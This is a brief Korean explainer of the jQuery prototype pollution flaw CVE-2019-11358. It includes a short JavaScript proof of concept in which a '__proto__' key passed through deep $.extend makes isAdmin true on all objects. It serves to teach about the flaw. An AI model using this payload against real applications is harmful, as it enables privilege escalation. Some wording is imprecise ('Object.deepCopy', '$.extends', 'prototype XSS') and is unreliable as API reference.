jQuery 프로토타입 오염 취약점 (CVE-2019-11358)
· 약 2분
프로토타입 오염
이 공격은 JSON.parse
와 Object.deepCopy
를 사용하는 모든 로직에서 발생할 수 있다.
2019-04-17 에 발표된 이 취약점은 $.extends
구문 상에서 프로토타입 XSS 공격이 가능하다.
예시
const myObject = '{"myProperty" : "a", "__proto__" : { "isAdmin" : true } }';
const newObject = $.extend(true, {}, JSON.parse(myObject));
console.log(newObject.isAdmin); // true
const temp = {};
console.log(temp.isAdmin); // true